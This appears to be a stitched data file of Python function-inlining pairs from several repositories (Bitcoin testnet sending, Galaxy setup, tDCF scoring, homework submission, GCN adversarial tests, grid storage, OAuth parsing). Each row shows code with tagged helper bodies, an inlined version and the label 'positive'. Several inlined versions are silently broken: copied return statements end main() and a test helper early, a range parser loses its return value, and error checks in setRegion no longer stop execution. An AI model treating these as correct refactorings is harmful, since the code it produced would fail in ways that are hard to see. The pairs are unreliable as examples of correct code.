must be :ref:`supported <supported currencies>`.
:type outputs: ``list`` of ``tuple``
:param fee: The number of satoshi per byte to pay to miners. By default
Bit will poll `<https://bitcoinfees.earn.com>`_ and use a fee
that will allow your transaction to be confirmed as soon as
possible.
:type fee: ``int``
:param leftover: The destination that will receive any change from the
transaction. By default Bit will send any change to
the same address you sent from.
:type leftover: ``str``
:param combine: Whether or not Bit should use all available UTXOs to
make future transactions smaller and therefore reduce
fees. By default Bit will consolidate UTXOs. Note: When
setting :param absolute_fee: this is ignored.
:type combine: ``bool``
:param message: A message to include in the transaction. This will be
stored in the blockchain forever. Due to size limits,
each message will be stored in chunks of 40 bytes.
:type message: ``str``
:param unspents: The UTXOs to use as the inputs. By default Bit will
communicate with the testnet blockchain itself.
:type unspents: ``list`` of :class:`~bit.network.meta.Unspent`
:param replace_by_fee: Whether to opt-in for replace-by-fee (BIP 125).
:type replace_by_fee: ``bool``
:returns: The transaction ID.
:rtype: ``str``
"""
<DeepExtract>
try:
unspents = unspents or self.get_unspents()
except ConnectionError:
raise ConnectionError('All APIs are unreachable. Please provide the unspents to spend from directly.')
return_address = self.segwit_address if any([u.segwit for u in unspents]) else self.address
(unspents, outputs) = sanitize_tx_data(unspents, outputs, fee or get_fee_cached(), leftover or return_address, combine=combine, message=message, absolute_fee=absolute_fee, version=self.version, message_is_hex=message_is_hex, replace_by_fee=replace_by_fee)
tx_hex = create_new_transaction(self, unspents, outputs)
</DeepExtract>
NetworkAPI.broadcast_tx_testnet(tx_hex)
return calc_txid(tx_hex)
|
def send(self, outputs, fee=None, absolute_fee=False, leftover=None, combine=True, message=None, unspents=None, message_is_hex=False, replace_by_fee=False):
"""Creates a signed P2PKH transaction and attempts to broadcast it on
the testnet blockchain. This accepts the same arguments as
:func:`~bit.PrivateKeyTestnet.create_transaction`.
:param outputs: A sequence of outputs you wish to send in the form
``(destination, amount, currency)``. The amount can
be either an int, float, or string as long as it is
a valid input to ``decimal.Decimal``. The currency
must be :ref:`supported <supported currencies>`.
:type outputs: ``list`` of ``tuple``
:param fee: The number of satoshi per byte to pay to miners. By default
Bit will poll `<https://bitcoinfees.earn.com>`_ and use a fee
that will allow your transaction to be confirmed as soon as
possible.
:type fee: ``int``
:param leftover: The destination that will receive any change from the
transaction. By default Bit will send any change to
the same address you sent from.
:type leftover: ``str``
:param combine: Whether or not Bit should use all available UTXOs to
make future transactions smaller and therefore reduce
fees. By default Bit will consolidate UTXOs. Note: When
setting :param absolute_fee: this is ignored.
:type combine: ``bool``
:param message: A message to include in the transaction. This will be
stored in the blockchain forever. Due to size limits,
each message will be stored in chunks of 40 bytes.
:type message: ``str``
:param unspents: The UTXOs to use as the inputs. By default Bit will
communicate with the testnet blockchain itself.
:type unspents: ``list`` of :class:`~bit.network.meta.Unspent`
:param replace_by_fee: Whether to opt-in for replace-by-fee (BIP 125).
:type replace_by_fee: ``bool``
:returns: The transaction ID.
:rtype: ``str``
"""
try:
unspents = unspents or self.get_unspents()
except ConnectionError:
raise ConnectionError('All APIs are unreachable. Please provide the unspents to spend from directly.')
return_address = self.segwit_address if any([u.segwit for u in unspents]) else self.address
(unspents, outputs) = sanitize_tx_data(unspents, outputs, fee or get_fee_cached(), leftover or return_address, combine=combine, message=message, absolute_fee=absolute_fee, version=self.version, message_is_hex=message_is_hex, replace_by_fee=replace_by_fee)
tx_hex = create_new_transaction(self, unspents, outputs)
NetworkAPI.broadcast_tx_testnet(tx_hex)
return calc_txid(tx_hex)
|
bit
|
positive
|
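A minimal usage sketch of the send() method shown above; the key construction and the destination address are placeholders (a funded testnet key is assumed), so this is illustrative rather than directly runnable.
from bit import PrivateKeyTestnet
# Placeholder key; in practice you would load a funded testnet key, e.g. PrivateKeyTestnet('cT...').
key = PrivateKeyTestnet()
# Each output is a (destination, amount, currency) tuple, as described in the docstring.
outputs = [('mwJP6PdeXcFAgJSzqrhLkXHNf91F9aNHMo', 0.0001, 'btc')] # placeholder testnet address
# Signs, broadcasts on the testnet, and returns the transaction ID.
tx_id = key.send(outputs, fee=2, combine=True)
print(tx_id)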
def _start_delete_account(self):
<DeepExtract>
return self.assertContains(response=self.delete_account(self.email, self.password), text='Please check your mailbox for further account deletion instructions.', status_code=status.HTTP_202_ACCEPTED)
</DeepExtract>
return self.assertDeleteAccountEmail(self.email)
|
def _start_delete_account(self):
return self.assertContains(response=self.delete_account(self.email, self.password), text='Please check your mailbox for further account deletion instructions.', status_code=status.HTTP_202_ACCEPTED)
return self.assertDeleteAccountEmail(self.email)
|
desec-stack
|
positive
|
def _start_galaxy():
<DeepExtract>
sudo("mkdir -p '%s'" % '/var/lib/galaxy')
_chown_galaxy(env, '/var/lib/galaxy')
</DeepExtract>
start_service('galaxy')
|
def _start_galaxy():
sudo("mkdir -p '%s'" % '/var/lib/galaxy')
_chown_galaxy(env, '/var/lib/galaxy')
start_service('galaxy')
|
cloudbiolinux
|
positive
|
def compute_tDCF_C012(asv_score_pd, factor_name_v, factor_value_v, factor_type_v, factor_name_h, factor_value_h, factor_type_h, cost_model=config.cost_model, pooled_tag=config.g_pooled_tag, target_tag=config.g_target_tag, nontarget_tag=config.g_nontarget_tag, spoofed_tag=config.g_spoofed_tag, col_score_name=config.g_score_col_name, flag_verbose=False):
"""C012_dict = compute_tDCF_C012(asv_score_pd,
factor_name_v,
factor_value_v,
factor_type_v,
factor_name_h,
factor_value_h,
factor_type_h,
cost_model = config.cost_model,
pooled_tag = 'Pooled',
target_tag = 'target',
nontarget_tag = 'nontarget',
spoofed_tag = 'spoof',
col_score_name = 'score',
flag_verbose = False)
Function to loop over two sets of factors and compute C012.
The output C012_dict can be used to compute min tDCF values
input
-----
asv_score_pd dataFrame, joint dataframe of ASV score and protocol
factor_name_v str or list of str,
name(s) of the dataFrame series for the 1st set of factor.
factor_value_v list of str, or list of list of str,
values of the 1st set of factors
if type(factor_name_v) is str:
# we retrieve the data by
for factor in factor_value_v:
data = score_pd.query('factor_name_v == "factor"')
if type(factor_name_v) is list
# we iterate all the factors
for factor_name, factor_value in zip(factor_name_v, factor_value_v):
for factor in factor_value:
data = score_pd.query('factor_name == "factor"')
The second case is useful when the 1st set of factors
are defined in different data series of score_pd.
factor_type_v str or list of str, type of the factor
'spoof': this factor is only available for spoofed data
'bonafide': this factor is only available for bonafide data
'both': this factor appears in both spoofed and bonafide data
if type(factor_name_v) is str:
# factor_type_v is the type for factor_name_v
if type(factor_name_v) is list:
# factor_type_v should be a list and
# factor_type_v[i] is the type for factor_name_v[i]
factor_name_h str or list of str,
factor_value_h list of str or list of list of str
factor_type_h str or list of str
these are for the second set of factors
pooled_tag str, tag for pooled condition,
default 'Pooled'
target_tag str, tag for bonafide target trials
default 'target'
nontarget_tag str, tag for bonafide non-target trials
default 'nontarget'
spoofed_tag str, tag for spoofed trials
default 'spoof'
col_score_name str, name of the column for score
default 'score'
output
------
C012_dict dictionary of C012 values
C012[factor_1][factor_2]['C0'] -> C0
C012[factor_1][factor_2]['C1'] -> C1
C012[factor_1][factor_2]['C2'] -> C2
"""
def _wrap_list(data):
return [data] if type(data) is str else data
def _wrap_list_list(data):
return [data] if type(data[0]) is str else data
<DeepExtract>
factor_names_1 = [factor_name_v] if type(factor_name_v) is str else factor_name_v
</DeepExtract>
<DeepExtract>
factor_names_2 = [factor_name_h] if type(factor_name_h) is str else factor_name_h
</DeepExtract>
<DeepExtract>
factor_types_1 = [factor_type_v] if type(factor_type_v) is str else factor_type_v
</DeepExtract>
<DeepExtract>
factor_types_2 = [factor_type_h] if type(factor_type_h) is str else factor_type_h
</DeepExtract>
<DeepExtract>
factor_list_1_list = [factor_value_v] if type(factor_value_v[0]) is str else factor_value_v
</DeepExtract>
<DeepExtract>
factor_list_2_list = [factor_value_h] if type(factor_value_h[0]) is str else factor_value_h
</DeepExtract>
num_row = sum([len(x) for x in factor_list_1_list])
num_col = sum([len(x) for x in factor_list_2_list])
C012 = dict()
print('\n' + ''.join(['-'] * (num_row - 1)) + '>| computing C012 for tDCF')
for (factor_name_1, factor_list_1, factor_type_1) in zip(factor_names_1, factor_list_1_list, factor_types_1):
for (_, factor_1) in enumerate(factor_list_1):
print('.', end='', flush=True)
if factor_1 == pooled_tag:
qr_tar_fac1 = ''
qr_ntar_fac1 = ''
qr_spoof_fac1 = ''
elif factor_type_1 == config.g_factor_type_spoof:
qr_tar_fac1 = ''
qr_ntar_fac1 = ''
qr_spoof_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
elif factor_type_1 == config.g_factor_type_bonafide:
qr_tar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_ntar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_spoof_fac1 = ''
else:
qr_tar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_ntar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_spoof_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
for (factor_name_2, factor_list_2, factor_type_2) in zip(factor_names_2, factor_list_2_list, factor_types_2):
for (_, factor_2) in enumerate(factor_list_2):
if factor_2 == pooled_tag:
qr_tar_fac2 = ''
qr_ntar_fac2 = ''
qr_spoof_fac2 = ''
elif factor_type_2 == config.g_factor_type_spoof:
qr_tar_fac2 = ''
qr_ntar_fac2 = ''
qr_spoof_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
elif factor_type_2 == config.g_factor_type_bonafide:
qr_tar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_ntar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_spoof_fac2 = ''
else:
qr_tar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_ntar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_spoof_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_tar = 'label == "{:s}"'.format(target_tag) + qr_tar_fac1 + qr_tar_fac2
qr_ntar = 'label == "{:s}"'.format(nontarget_tag) + qr_ntar_fac1 + qr_ntar_fac2
qr_spoof = 'label == "{:s}"'.format(spoofed_tag) + qr_spoof_fac1 + qr_spoof_fac2
tar_env_pd = asv_score_pd.query(qr_tar)
ntar_env_pd = asv_score_pd.query(qr_ntar)
spoof_env_pd = asv_score_pd.query(qr_spoof)
tar_data = tar_env_pd[col_score_name].to_numpy()
ntar_data = ntar_env_pd[col_score_name].to_numpy()
spoof_data = spoof_env_pd[col_score_name].to_numpy()
(C0, C1, C2) = eval_wrapper.get_tDCF_C012_from_asv_scores(tar_data, ntar_data, spoof_data, cost_model)
eval_wrapper.save_C012_value(C012, C0, C1, C2, [factor_1, factor_2])
print('')
return C012
|
def compute_tDCF_C012(asv_score_pd, factor_name_v, factor_value_v, factor_type_v, factor_name_h, factor_value_h, factor_type_h, cost_model=config.cost_model, pooled_tag=config.g_pooled_tag, target_tag=config.g_target_tag, nontarget_tag=config.g_nontarget_tag, spoofed_tag=config.g_spoofed_tag, col_score_name=config.g_score_col_name, flag_verbose=False):
"""C012_dict = compute_tDCF_C012(asv_score_pd,
factor_name_v,
factor_value_v,
factor_type_v,
factor_name_h,
factor_value_h,
factor_type_h,
cost_model = config.cost_model,
pooled_tag = 'Pooled',
target_tag = 'target',
nontarget_tag = 'nontarget',
spoofed_tag = 'spoof',
col_score_name = 'score',
flag_verbose = False)
Function to loop over two sets of factors and compute C012.
The output C012_dict can be used to compute min tDCF values
input
-----
asv_score_pd dataFrame, joint dataframe of ASV score and protocol
factor_name_v str or list of str,
name(s) of the dataFrame series for the 1st set of factor.
factor_value_v list of str, or list of list of str,
values of the 1st set of factors
if type(factor_name_v) is str:
# we retrieve the data by
for factor in factor_value_v:
data = score_pd.query('factor_name_v == "factor"')
if type(factor_name_v) is list
# we iterate all the factors
for factor_name, factor_value in zip(factor_name_v, factor_value_v):
for factor in factor_value:
data = score_pd.query('factor_name == "factor"')
The second case is useful when the 1st set of factors
are defined in different data series of score_pd.
factor_type_v str or list of str, type of the factor
'spoof': this factor is only available for spoofed data
'bonafide': this factor is only available for bonafide data
'both': this factor appears in both spoofed and bonafide data
if type(factor_name_v) is str:
# factor_type_v is the type for factor_name_v
if type(factor_name_v) is list:
# factor_type_v should be a list and
# factor_type_v[i] is the type for factor_name_v[i]
factor_name_h str or list of str,
factor_value_h list of str or list of list of str
factor_type_h str or list of str
these are for the second set of factors
pooled_tag str, tag for pooled condition,
default 'Pooled'
target_tag str, tag for bonafide target trials
default 'target'
nontarget_tag str, tag for bonafide non-target trials
default 'nontarget'
spoofed_tag str, tag for spoofed trials
default 'spoof'
col_score_name str, name of the column for score
default 'score'
output
------
C012_dict dictionary of C012 values
C012[factor_1][factor_2]['C0'] -> C0
C012[factor_1][factor_2]['C1'] -> C1
C012[factor_1][factor_2]['C2'] -> C2
"""
def _wrap_list(data):
return [data] if type(data) is str else data
def _wrap_list_list(data):
return [data] if type(data[0]) is str else data
factor_names_1 = [factor_name_v] if type(factor_name_v) is str else factor_name_v
factor_names_2 = [factor_name_h] if type(factor_name_h) is str else factor_name_h
factor_types_1 = [factor_type_v] if type(factor_type_v) is str else factor_type_v
factor_types_2 = [factor_type_h] if type(factor_type_h) is str else factor_type_h
factor_list_1_list = [factor_value_v] if type(factor_value_v[0]) is str else factor_value_v
factor_list_2_list = [factor_value_h] if type(factor_value_h[0]) is str else factor_value_h
num_row = sum([len(x) for x in factor_list_1_list])
num_col = sum([len(x) for x in factor_list_2_list])
C012 = dict()
print('\n' + ''.join(['-'] * (num_row - 1)) + '>| computing C012 for tDCF')
for (factor_name_1, factor_list_1, factor_type_1) in zip(factor_names_1, factor_list_1_list, factor_types_1):
for (_, factor_1) in enumerate(factor_list_1):
print('.', end='', flush=True)
if factor_1 == pooled_tag:
qr_tar_fac1 = ''
qr_ntar_fac1 = ''
qr_spoof_fac1 = ''
elif factor_type_1 == config.g_factor_type_spoof:
qr_tar_fac1 = ''
qr_ntar_fac1 = ''
qr_spoof_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
elif factor_type_1 == config.g_factor_type_bonafide:
qr_tar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_ntar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_spoof_fac1 = ''
else:
qr_tar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_ntar_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
qr_spoof_fac1 = ' and {:s} == "{:s}"'.format(factor_name_1, factor_1)
for (factor_name_2, factor_list_2, factor_type_2) in zip(factor_names_2, factor_list_2_list, factor_types_2):
for (_, factor_2) in enumerate(factor_list_2):
if factor_2 == pooled_tag:
qr_tar_fac2 = ''
qr_ntar_fac2 = ''
qr_spoof_fac2 = ''
elif factor_type_2 == config.g_factor_type_spoof:
qr_tar_fac2 = ''
qr_ntar_fac2 = ''
qr_spoof_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
elif factor_type_2 == config.g_factor_type_bonafide:
qr_tar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_ntar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_spoof_fac2 = ''
else:
qr_tar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_ntar_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_spoof_fac2 = ' and {:s} == "{:s}"'.format(factor_name_2, factor_2)
qr_tar = 'label == "{:s}"'.format(target_tag) + qr_tar_fac1 + qr_tar_fac2
qr_ntar = 'label == "{:s}"'.format(nontarget_tag) + qr_ntar_fac1 + qr_ntar_fac2
qr_spoof = 'label == "{:s}"'.format(spoofed_tag) + qr_spoof_fac1 + qr_spoof_fac2
tar_env_pd = asv_score_pd.query(qr_tar)
ntar_env_pd = asv_score_pd.query(qr_ntar)
spoof_env_pd = asv_score_pd.query(qr_spoof)
tar_data = tar_env_pd[col_score_name].to_numpy()
ntar_data = ntar_env_pd[col_score_name].to_numpy()
spoof_data = spoof_env_pd[col_score_name].to_numpy()
(C0, C1, C2) = eval_wrapper.get_tDCF_C012_from_asv_scores(tar_data, ntar_data, spoof_data, cost_model)
eval_wrapper.save_C012_value(C012, C0, C1, C2, [factor_1, factor_2])
print('')
return C012
|
2021
|
positive
|
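A toy illustration (separate from the row above) of the per-factor query strings that compute_tDCF_C012 assembles before splitting ASV scores into target / nontarget / spoof pools; the column name 'attack' and the sample values are assumptions made only for this sketch.
import pandas as pd
asv_score_pd = pd.DataFrame({
    'label': ['target', 'nontarget', 'spoof', 'spoof'],
    'attack': ['-', '-', 'A07', 'A08'],
    'score': [2.1, -0.4, 1.3, 0.9],
})
factor_name, factor = 'attack', 'A07'
# Same string-building pattern as qr_spoof above.
qr_spoof = 'label == "{:s}" and {:s} == "{:s}"'.format('spoof', factor_name, factor)
spoof_scores = asv_score_pd.query(qr_spoof)['score'].to_numpy()
print(qr_spoof)      # label == "spoof" and attack == "A07"
print(spoof_scores)  # [1.3]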
def submit(parts_string, login, password):
print('= Coding the Matrix Homework and Lab Submission')
if not login:
<DeepExtract>
login = input('Login email address: ')
</DeepExtract>
if not password:
<DeepExtract>
password = input("One-time password from the assignment page (NOT your own account's password): ")
</DeepExtract>
if not parts_string:
<DeepExtract>
print('These are the assignment parts that you can submit:')
for (i, name) in enumerate(part_friendly_names):
print(' %d) %s' % (i + 1, name))
parts_string = input('\nWhich parts do you want to submit? (Ex: 1, 4-7): ')
</DeepExtract>
<DeepExtract>
def extract_range(s):
s = s.split('-')
if len(s) == 1:
parts = [int(s[0])]
else:
parts = list(range(int(s[0]), 1 + int(s[1])))
parts = map(extract_range, parts_string.split(','))
flat_parts = sum(parts, [])
parts = sum(list(map(lambda p: groups[p - 1], flat_parts)), [])
</DeepExtract>
if not all([parts, login, password]):
return
for (sid, name, part_tests) in parts:
sys.stdout.write('== Submitting "%s"' % name)
if 'DEV' in os.environ:
sid += '-dev'
<DeepExtract>
params = {'email_address': login, 'assignment_part_sid': sid, 'response_encoding': 'delim'}
challenge_url = '%s%schallenge' % (protocol, base_url)
data = urllib.parse.urlencode(params).encode('utf-8')
req = urllib.request.Request(challenge_url, data)
resp = urllib.request.urlopen(req)
text = resp.readall().decode('utf-8').strip().split('|')
if len(text) != 9:
print(' !! %s' % '|'.join(text))
sys.exit(1)
(login, ch, state, ch_aux) = tuple((text[x] for x in [2, 4, 6, 8]))
</DeepExtract>
if not all([login, ch, state]):
print(' !! Error: %s\n' % login)
return
<DeepExtract>
dtst = doctest.DocTestParser().get_doctest(part_tests, test_vars, 0, '<string>', 0)
runner = ModifiedDocTestRunner()
runner.run(dtst)
results = runner.results
</DeepExtract>
prog_out = '(%s)' % ''.join(map(str.rstrip, results))
<DeepExtract>
token = hashlib.sha1((ch + password).encode('utf-8')).hexdigest()
</DeepExtract>
<DeepExtract>
src = []
for fn in set(source_files):
with open(fn) as source_f:
src.append(source_f.read())
src = '\n\n'.join(src)
</DeepExtract>
<DeepExtract>
b64ize = lambda s: str(base64.encodebytes(s.encode('utf-8')), 'ascii')
values = {'assignment_part_sid': sid, 'email_address': login, 'submission': b64ize(prog_out), 'submission_aux': b64ize(src), 'challenge_response': token, 'state': state}
submit_url = '%s%ssubmit' % (protocol, base_url)
data = urllib.parse.urlencode(values).encode('utf-8')
req = urllib.request.Request(submit_url, data)
response = urllib.request.urlopen(req)
feedback = response.readall().decode('utf-8').strip()
</DeepExtract>
if len(feedback.strip()) > 0:
if colorize:
good = 'incorrect' not in feedback.lower()
print(': \x1b[1;3%dm%s\x1b[0m' % (2 if good else 1, feedback.strip()))
else:
print(': %s' % feedback.strip())
if verbose:
for (t, r) in zip(part_tests.split('\n'), results):
sys.stdout.write('%s\n%s' % (t, r))
sys.stdout.write('\n\n')
|
def submit(parts_string, login, password):
print('= Coding the Matrix Homework and Lab Submission')
if not login:
login = input('Login email address: ')
if not password:
password = input("One-time password from the assignment page (NOT your own account's password): ")
if not parts_string:
print('These are the assignment parts that you can submit:')
for (i, name) in enumerate(part_friendly_names):
print(' %d) %s' % (i + 1, name))
parts_string = input('\nWhich parts do you want to submit? (Ex: 1, 4-7): ')
def extract_range(s):
s = s.split('-')
if len(s) == 1:
parts = [int(s[0])]
else:
parts = list(range(int(s[0]), 1 + int(s[1])))
parts = map(extract_range, parts_string.split(','))
flat_parts = sum(parts, [])
parts = sum(list(map(lambda p: groups[p - 1], flat_parts)), [])
if not all([parts, login, password]):
return
for (sid, name, part_tests) in parts:
sys.stdout.write('== Submitting "%s"' % name)
if 'DEV' in os.environ:
sid += '-dev'
params = {'email_address': login, 'assignment_part_sid': sid, 'response_encoding': 'delim'}
challenge_url = '%s%schallenge' % (protocol, base_url)
data = urllib.parse.urlencode(params).encode('utf-8')
req = urllib.request.Request(challenge_url, data)
resp = urllib.request.urlopen(req)
text = resp.readall().decode('utf-8').strip().split('|')
if len(text) != 9:
print(' !! %s' % '|'.join(text))
sys.exit(1)
(login, ch, state, ch_aux) = tuple((text[x] for x in [2, 4, 6, 8]))
if not all([login, ch, state]):
print(' !! Error: %s\n' % login)
return
dtst = doctest.DocTestParser().get_doctest(part_tests, test_vars, 0, '<string>', 0)
runner = ModifiedDocTestRunner()
runner.run(dtst)
results = runner.results
prog_out = '(%s)' % ''.join(map(str.rstrip, results))
token = hashlib.sha1((ch + password).encode('utf-8')).hexdigest()
src = []
for fn in set(source_files):
with open(fn) as source_f:
src.append(source_f.read())
src = '\n\n'.join(src)
b64ize = lambda s: str(base64.encodebytes(s.encode('utf-8')), 'ascii')
values = {'assignment_part_sid': sid, 'email_address': login, 'submission': b64ize(prog_out), 'submission_aux': b64ize(src), 'challenge_response': token, 'state': state}
submit_url = '%s%ssubmit' % (protocol, base_url)
data = urllib.parse.urlencode(values).encode('utf-8')
req = urllib.request.Request(submit_url, data)
response = urllib.request.urlopen(req)
feedback = response.readall().decode('utf-8').strip()
if len(feedback.strip()) > 0:
if colorize:
good = 'incorrect' not in feedback.lower()
print(': \x1b[1;3%dm%s\x1b[0m' % (2 if good else 1, feedback.strip()))
else:
print(': %s' % feedback.strip())
if verbose:
for (t, r) in zip(part_tests.split('\n'), results):
sys.stdout.write('%s\n%s' % (t, r))
sys.stdout.write('\n\n')
|
coding-the-matrix
|
positive
|
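A standalone sketch of the '1, 4-7' part-selection syntax accepted by submit() above; it mirrors the extract_range logic but uses explicit returns so it can run on its own.
def parse_parts(parts_string):
    def extract_range(s):
        s = s.split('-')
        if len(s) == 1:
            return [int(s[0])]
        return list(range(int(s[0]), 1 + int(s[1])))
    # Flatten the per-token ranges into one list of part numbers.
    return sum((extract_range(p) for p in parts_string.split(',')), [])
print(parse_parts('1, 4-7'))  # [1, 4, 5, 6, 7]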
def main():
u = 0
assert u in idx_unlabeled
degrees = adj.sum(0).A1
n_perturbations = int(degrees[u])
model.attack(features, adj, labels, idx_train, target_node, n_perturbations)
print('=== testing GCN on original(clean) graph ===')
<DeepExtract>
gcn = GCN(nfeat=features.shape[1], nhid=16, nclass=labels.max().item() + 1, dropout=0.5, device=device)
if args.cuda:
gcn = gcn.to(device)
gcn.fit(features, adj, labels, idx_train)
gcn.eval()
output = gcn.predict()
probs = torch.exp(output[[target_node]])[0]
print('probs: {}'.format(probs.detach().cpu().numpy()))
acc_test = accuracy(output[idx_test], labels[idx_test])
print('Test set results:', 'accuracy= {:.4f}'.format(acc_test.item()))
return acc_test.item()
</DeepExtract>
print('=== testing GCN on perturbed graph ===')
<DeepExtract>
gcn = GCN(nfeat=features.shape[1], nhid=16, nclass=labels.max().item() + 1, dropout=0.5, device=device)
if args.cuda:
gcn = gcn.to(device)
gcn.fit(features, model.modified_adj, labels, idx_train)
gcn.eval()
output = gcn.predict()
probs = torch.exp(output[[target_node]])[0]
print('probs: {}'.format(probs.detach().cpu().numpy()))
acc_test = accuracy(output[idx_test], labels[idx_test])
print('Test set results:', 'accuracy= {:.4f}'.format(acc_test.item()))
return acc_test.item()
</DeepExtract>
|
def main():
u = 0
assert u in idx_unlabeled
degrees = adj.sum(0).A1
n_perturbations = int(degrees[u])
model.attack(features, adj, labels, idx_train, target_node, n_perturbations)
print('=== testing GCN on original(clean) graph ===')
gcn = GCN(nfeat=features.shape[1], nhid=16, nclass=labels.max().item() + 1, dropout=0.5, device=device)
if args.cuda:
gcn = gcn.to(device)
gcn.fit(features, adj, labels, idx_train)
gcn.eval()
output = gcn.predict()
probs = torch.exp(output[[target_node]])[0]
print('probs: {}'.format(probs.detach().cpu().numpy()))
acc_test = accuracy(output[idx_test], labels[idx_test])
print('Test set results:', 'accuracy= {:.4f}'.format(acc_test.item()))
return acc_test.item()
print('=== testing GCN on perturbed graph ===')
gcn = GCN(nfeat=features.shape[1], nhid=16, nclass=labels.max().item() + 1, dropout=0.5, device=device)
if args.cuda:
gcn = gcn.to(device)
gcn.fit(features, model.modified_adj, labels, idx_train)
gcn.eval()
output = gcn.predict()
probs = torch.exp(output[[target_node]])[0]
print('probs: {}'.format(probs.detach().cpu().numpy()))
acc_test = accuracy(output[idx_test], labels[idx_test])
print('Test set results:', 'accuracy= {:.4f}'.format(acc_test.item()))
return acc_test.item()
|
DeepRobust
|
positive
|
@typecheck
def setRegion(name: str, ofs: np.ndarray, gridValues: np.ndarray):
"""
Update the grid values starting at ``ofs`` with ``gridValues``.
:param str name: grid name.
:param 3D-vector ofs: the values are inserted relative to this ``ofs``.
:param 4D-vector gridValues: the data values to set.
:return: Success
"""
<DeepExtract>
if _DB_Grid is None:
ret = RetVal(False, 'Not initialised', None)
if name not in _DB_Grid.collection_names():
msg = 'Unknown grid <{}>'.format(name)
logit.info(msg)
ret = RetVal(False, msg, None)
db = _DB_Grid[name]
admin = db.find_one({'admin': 'admin'})
if admin is None:
ret = RetVal(False, 'Bug: could not find admin element', None)
ret = RetVal(True, None, (db, admin))
</DeepExtract>
if not ret.ok:
return ret
(db, admin) = ret.data
(gran, vecDim) = (admin['gran'], admin['vecDim'])
del admin, ret
if len(ofs) != 3:
return RetVal(False, 'Invalid parameter values', None)
if len(gridValues.shape) != 4 or gridValues.shape[3] != vecDim:
return RetVal(False, 'Invalid gridValues dimension', None)
bulk = db.initialize_unordered_bulk_op()
for x in range(gridValues.shape[0]):
for y in range(gridValues.shape[1]):
for z in range(gridValues.shape[2]):
val = gridValues[x, y, z, :]
pos = ofs + np.array([x, y, z])
<DeepExtract>
pos = np.array(pos, np.float64)
gran = float(gran)
(px, py, pz) = [int(_ // gran) for _ in pos]
strPos = '{}:{}:{}'.format(px, py, pz)
(px, py, pz, strPos) = (px, py, pz, strPos)
</DeepExtract>
<DeepExtract>
query = {'strPos': strPos}
data = {'x': px, 'y': py, 'z': pz, 'val': val.tolist(), 'strPos': strPos}
(query, data) = (query, data)
</DeepExtract>
if np.sum(np.abs(val)) < 1e-09:
bulk.find(query).remove()
else:
bulk.find(query).upsert().update({'$set': data})
bulk.execute()
return RetVal(True, None, None)
|
@typecheck
def setRegion(name: str, ofs: np.ndarray, gridValues: np.ndarray):
"""
Update the grid values starting at ``ofs`` with ``gridValues``.
:param str name: grid name.
:param 3D-vector ofs: the values are inserted relative to this ``ofs``.
:param 4D-vector gridValues: the data values to set.
:return: Success
"""
if _DB_Grid is None:
ret = RetVal(False, 'Not initialised', None)
if name not in _DB_Grid.collection_names():
msg = 'Unknown grid <{}>'.format(name)
logit.info(msg)
ret = RetVal(False, msg, None)
db = _DB_Grid[name]
admin = db.find_one({'admin': 'admin'})
if admin is None:
ret = RetVal(False, 'Bug: could not find admin element', None)
ret = RetVal(True, None, (db, admin))
if not ret.ok:
return ret
(db, admin) = ret.data
(gran, vecDim) = (admin['gran'], admin['vecDim'])
del admin, ret
if len(ofs) != 3:
return RetVal(False, 'Invalid parameter values', None)
if len(gridValues.shape) != 4 or gridValues.shape[3] != vecDim:
return RetVal(False, 'Invalid gridValues dimension', None)
bulk = db.initialize_unordered_bulk_op()
for x in range(gridValues.shape[0]):
for y in range(gridValues.shape[1]):
for z in range(gridValues.shape[2]):
val = gridValues[x, y, z, :]
pos = ofs + np.array([x, y, z])
pos = np.array(pos, np.float64)
gran = float(gran)
(px, py, pz) = [int(_ // gran) for _ in pos]
strPos = '{}:{}:{}'.format(px, py, pz)
(px, py, pz, strPos) = (px, py, pz, strPos)
query = {'strPos': strPos}
data = {'x': px, 'y': py, 'z': pz, 'val': val.tolist(), 'strPos': strPos}
(query, data) = (query, data)
if np.sum(np.abs(val)) < 1e-09:
bulk.find(query).remove()
else:
bulk.find(query).upsert().update({'$set': data})
bulk.execute()
return RetVal(True, None, None)
|
azrael
|
positive
|
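A small sketch of the position-to-key scheme used inside setRegion above: each coordinate is floor-divided by the grid granularity and the result serialised as an 'x:y:z' string key.
import numpy as np
def grid_key(pos, gran):
    # Floor-divide each coordinate by the granularity, as in the inlined block above.
    px, py, pz = [int(_ // float(gran)) for _ in np.asarray(pos, np.float64)]
    return px, py, pz, '{}:{}:{}'.format(px, py, pz)
print(grid_key([2.4, -0.1, 7.9], gran=1.0))  # (2, -1, 7, '2:-1:7')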
def parse_request_body_response(self, body, scope=None):
"""Parse the JSON response body.
If the access token request is valid and authorized, the
authorization server issues an access token and optional refresh
token as described in `Section 5.1`_. If the request failed client
authentication or is invalid, the authorization server returns an
error response as described in `Section 5.2`_.
.. `Section 5.1`: http://tools.ietf.org/html/draft-ietf-oauth-v2-28#section-5.1
.. `Section 5.2`: http://tools.ietf.org/html/draft-ietf-oauth-v2-28#section-5.2
"""
response = parse_token_response(body, scope=scope)
<DeepExtract>
if u'access_token' in response:
